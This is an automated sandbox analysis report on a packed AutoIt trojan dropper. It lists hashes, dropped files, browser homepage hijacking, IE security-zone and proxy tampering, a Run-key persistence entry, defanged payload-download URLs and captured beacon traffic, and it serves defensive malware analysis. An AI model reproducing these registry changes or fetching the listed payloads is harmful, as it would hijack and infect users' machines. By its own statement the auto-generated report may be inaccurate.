Gen.Variant.Strictor.64418_1e41782728
Trojan.Win32.Agent.aiees (Kaspersky), Gen:Variant.Strictor.64418 (AdAware), Worm.Win32.AutoIt.FD, mzpefinder_pcap_file.YR, WormAutoItGen.YR, PUPSpigot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, PUP
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 1e4178272898d52fc98df4fd61fc19bd
SHA1: d6a7f7381599f1c2c82933067b8880241534da66
SHA256: 3c8362249fc2d6b05e2ace148c2486cf5a8c8b72239416000937be678dca8276
SSDeep: 98304:4g56I8srmfGFJLPfLFnpEpghJc5dFk6vGJDew/b7OQN yJ8kZV02gn:n5vrpFRZCpnDvGxP/bBbJ8kZC2gn
Size: 7044096 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-06 16:28:48
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Google.exe:2196
vcredistx64.exe:3620
%original file name%.exe:2736
Index.exe:3872
The Trojan injects its code into the following process(es):
Setup.exe:2404
bdMiniDownloaderEG_MENAON-Mini_32_3313.exe:3740
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Google.exe:2196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (129048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (488329 bytes)
%Documents and Settings%\%current user%\Cookies\SCIB46R7.txt (115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\8.50130400527269.txt (406 bytes)
The process vcredistx64.exe:3620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\29bb03690662e5ba2efc\1028\LocalizedData.xml (753 bytes)
C:\29bb03690662e5ba2efc\sqmapi.dll (2385 bytes)
C:\29bb03690662e5ba2efc\Graphics\SysReqNotMet.ico (1 bytes)
C:\29bb03690662e5ba2efc\1049\SetupResources.dll (17 bytes)
C:\29bb03690662e5ba2efc\3082\SetupResources.dll (18 bytes)
C:\29bb03690662e5ba2efc\1041\LocalizedData.xml (885 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate4.ico (894 bytes)
C:\29bb03690662e5ba2efc\1041\SetupResources.dll (15 bytes)
C:\29bb03690662e5ba2efc\Strings.xml (14 bytes)
C:\29bb03690662e5ba2efc\1036\LocalizedData.xml (512 bytes)
C:\29bb03690662e5ba2efc\1040\SetupResources.dll (776 bytes)
C:\29bb03690662e5ba2efc\Graphics\Save.ico (1150 bytes)
C:\29bb03690662e5ba2efc\1036\eula.rtf (8 bytes)
C:\29bb03690662e5ba2efc\2052\LocalizedData.xml (403 bytes)
C:\29bb03690662e5ba2efc\1028\SetupResources.dll (13 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate5.ico (894 bytes)
C:\29bb03690662e5ba2efc\vc_red.msi (2454 bytes)
C:\29bb03690662e5ba2efc\DisplayIcon.ico (1877 bytes)
C:\29bb03690662e5ba2efc\SetupUi.dll (4564 bytes)
C:\29bb03690662e5ba2efc\1042\eula.rtf (1061 bytes)
C:\29bb03690662e5ba2efc\1040\LocalizedData.xml (807 bytes)
C:\29bb03690662e5ba2efc\DHtmlHeader.html (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Print.ico (1 bytes)
C:\29bb03690662e5ba2efc\1042\SetupResources.dll (14 bytes)
C:\29bb03690662e5ba2efc\1036\SetupResources.dll (993 bytes)
C:\29bb03690662e5ba2efc\vc_red.cab (72837 bytes)
C:\29bb03690662e5ba2efc\header.bmp (7 bytes)
C:\29bb03690662e5ba2efc\UiInfo.xml (1675 bytes)
C:\29bb03690662e5ba2efc\3082\eula.rtf (842 bytes)
C:\29bb03690662e5ba2efc\3082\LocalizedData.xml (994 bytes)
C:\29bb03690662e5ba2efc\SetupEngine.dll (12353 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate6.ico (894 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate1.ico (894 bytes)
C:\29bb03690662e5ba2efc\1042\LocalizedData.xml (341 bytes)
C:\29bb03690662e5ba2efc\1049\LocalizedData.xml (592 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate3.ico (894 bytes)
C:\29bb03690662e5ba2efc\Graphics\SysReqMet.ico (1 bytes)
C:\29bb03690662e5ba2efc\1049\eula.rtf (924 bytes)
C:\29bb03690662e5ba2efc\watermark.bmp (6023 bytes)
C:\29bb03690662e5ba2efc\SplashScreen.bmp (1049 bytes)
C:\29bb03690662e5ba2efc\$shtdwn$.req (788 bytes)
C:\29bb03690662e5ba2efc\1031\eula.rtf (789 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate7.ico (894 bytes)
C:\29bb03690662e5ba2efc\1033\LocalizedData.xml (1023 bytes)
C:\29bb03690662e5ba2efc\1028\eula.rtf (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Setup.ico (182 bytes)
C:\29bb03690662e5ba2efc\1041\eula.rtf (358 bytes)
C:\29bb03690662e5ba2efc\1031\LocalizedData.xml (658 bytes)
C:\29bb03690662e5ba2efc\2052\eula.rtf (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\warn.ico (10 bytes)
C:\29bb03690662e5ba2efc\2052\SetupResources.dll (272 bytes)
C:\29bb03690662e5ba2efc\1033\SetupResources.dll (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate8.ico (894 bytes)
C:\29bb03690662e5ba2efc\1031\SetupResources.dll (140 bytes)
C:\29bb03690662e5ba2efc\Graphics\stop.ico (10 bytes)
C:\29bb03690662e5ba2efc\1033\eula.rtf (7 bytes)
C:\29bb03690662e5ba2efc\Setup.exe (932 bytes)
C:\29bb03690662e5ba2efc\1040\eula.rtf (9 bytes)
C:\29bb03690662e5ba2efc\ParameterInfo.xml (654 bytes)
C:\29bb03690662e5ba2efc\SetupUi.xsd (556 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate2.ico (894 bytes)
The Trojan deletes the following file(s):
C:\_621609_ (0 bytes)
The process Setup.exe:2404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Microsoft Visual C 2010 x64 Redistributable Setup_20141027_025649617.html (54118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup_20141027_025641351.html (55598 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB5.tmp.html (22 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB6.tmp (0 bytes)
The process %original file name%.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\vcredistx64.exe (41656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (44680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5641 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (0 bytes)
The process bdMiniDownloaderEG_MENAON-Mini_32_3313.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\SparkMiniInstall.ini (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\package[1].xml (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\f0a5413bf497ed577eae2a88a8b8a193.gnet.tmp (5043 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (10 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\install[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\install[1].txt (0 bytes)
The process Index.exe:3872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\DA7WUGUH.txt (120 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe (129227 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\Google.exe (129271 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\updater[1].exe (489073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\google[1].exe (489298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777\11.3678106125444.txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777\11.3678106125444.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777 (0 bytes)
Registry activity
The process Google.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 B1 2D 85 06 F2 04 45 80 56 DF 21 7B 44 89 09"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page Redirect Cache" = "http://www.babal.net/?gjj"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.babal.net/?gjj"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "http://www.babal.net/?gjj"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_GamesID" = "80579"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default Page URL" = "http://www.babal.net/?gjj"
"Default_Page_URL" = "http://www.babal.net/?gjj"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process vcredistx64.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 0B 9F 6D F8 3E 0E CD 77 4D D5 91 E1 3B C8 24"
The process Setup.exe:2404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 F1 B6 BF DF 4D 51 B9 20 D3 1D 6E 39 F0 96 B8"
The process %original file name%.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE BC 03 28 E0 AA 8A 97 F4 8E 15 0C BB F7 2F EF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_Games_pl" = "8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"vcredistx64.exe" = "Microsoft Visual C 2010 x64 Redistributable Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Index.exe" = "Index"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process bdMiniDownloaderEG_MENAON-Mini_32_3313.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\bdMiniDownloaderEG_MENAON-Mini_32_3313\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 7A 9D 17 1D C1 F1 D3 05 07 B3 A1 E3 10 8B 9A"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\bdMiniDownloaderEG_MENAON-Mini_32_3313\DEBUG]
"Trace Level"
The process Index.exe:3872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 51 23 96 AE 91 70 39 CF F7 5B 83 EA 8B 85 DE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| ce844d12e884b8038d4d02f060a1ec9c | c:\29bb03690662e5ba2efc\1028\SetupResources.dll |
| c31942e7ccb510acae6518881734c2cc | c:\29bb03690662e5ba2efc\1031\SetupResources.dll |
| 718ab3eb3f43c9bcf16276c1eb17f2c1 | c:\29bb03690662e5ba2efc\1033\SetupResources.dll |
| e35532c4bb5b1cfc4e6808599c090405 | c:\29bb03690662e5ba2efc\1036\SetupResources.dll |
| c956e591a0c801b17693aa99098e4c6d | c:\29bb03690662e5ba2efc\1040\SetupResources.dll |
| 00eba8c995e91fa9c7a38221cc3c2ab2 | c:\29bb03690662e5ba2efc\1041\SetupResources.dll |
| c3607b83c32851d9b5fd44f33430ea58 | c:\29bb03690662e5ba2efc\1042\SetupResources.dll |
| 9fa7457abfa95bbe8e8a7814095a9a8b | c:\29bb03690662e5ba2efc\1049\SetupResources.dll |
| e4131092f32928a45757622c6b43b906 | c:\29bb03690662e5ba2efc\2052\SetupResources.dll |
| b5bac5815e01a14c21b00b1b75bee7a2 | c:\29bb03690662e5ba2efc\3082\SetupResources.dll |
| 9a1141fbceeb2e196ae1ba115fd4bee6 | c:\29bb03690662e5ba2efc\Setup.exe |
| a030c6b93740cbaa232ffaa08ccd3396 | c:\29bb03690662e5ba2efc\SetupEngine.dll |
| c744ec120e54027c57318c4720b4d6be | c:\29bb03690662e5ba2efc\SetupUi.dll |
| 3f0363b40376047eff6a9b97d633b750 | c:\29bb03690662e5ba2efc\sqmapi.dll |
| 09891842e7c5cf76823b47940d0998c7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Google\int\Google.exe |
| e0f5787847ebbee36cc8a443703ce436 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Google\int\Updater.exe |
| 6620e41cc69bd82820b2b7ab1924ee9a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Index.exe |
| cbe0b05c11d5d523c2af997d737c137b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\vcredistx64.exe |
| e0f5787847ebbee36cc8a443703ce436 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\updater[1].exe |
| 09891842e7c5cf76823b47940d0998c7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\google[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 570703 | 570880 | 4.63051 | f437a6545e938612764dbb0a314376fc |
| .rdata | 577536 | 183362 | 183808 | 3.99959 | 827ffd24759e8e420890ecf164be989e |
| .data | 761856 | 40276 | 25088 | 1.38816 | e0a519f8e3a35fae0d9c2cfd5a4bacfc |
| .rsrc | 802816 | 6220296 | 6220800 | 5.54505 | a80d33f8925a7aa88115279a96174f59 |
| .reloc | 7024640 | 42100 | 42496 | 3.63585 | 0bc98f8631ef0bde830a7f83bb06ff08 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://installs.cpa-install.com/ClientFiles/get/8 | |
| hxxp://installs.cpa-install.com/update/client_1/updater.exe | |
| hxxp://installs.cpa-install.com/update/client_1/google.exe | |
| hxxp://installs.cpa-install.com/computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214870345874/XP2/5.1/0&com=a&pl=8&prog_installs= | |
| hxxp://menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe | |
| hxxp://www.menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214870345874/XP2/5.1/0&com=a&pl=8&prog_installs= HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994
HTTP/1.1 200 OK
Date: Mon, 27 Oct 2014 06:01:58 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
Server: cloudflare-nginx
CF-RAY: 17fcae9678e906a3-EWR
196..80579.7$bdMiniDownloaderEG_MENAON-Mini_32_3313.exe$111111$hXXp://
menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe$NoUI=1 S
tart=1$Baidu Spark Browser.9$PC_Faster_Setup_Mini_E77_S.exe$111111$htt
p://download.pcfaster.baidu.com.eg/PC_Faster_Setup_Mini_E77_S.exe$/s /
NOTRAY$Baidu PC Faster.8$hao123armenona_ar.exe$111111$hXXp://VVV.menao
n.com/downloo/hao123armenona_ar.exe$ $Hao123-Client............0..
GET /ClientFiles/get/8 HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 27 Oct 2014 06:01:39 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 239
Connection: keep-alive
Set-Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.cpa-install.com; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
Server: cloudflare-nginx
CF-RAY: 17fcae22b02806a3-EWR
hXXp://installs.cpa-install.com/update/client_1/updater.exe$Updater.ex
e$@AppDataDir$\Google\int$HKEY_CURRENT_USER\Software\Microsoft\Windows
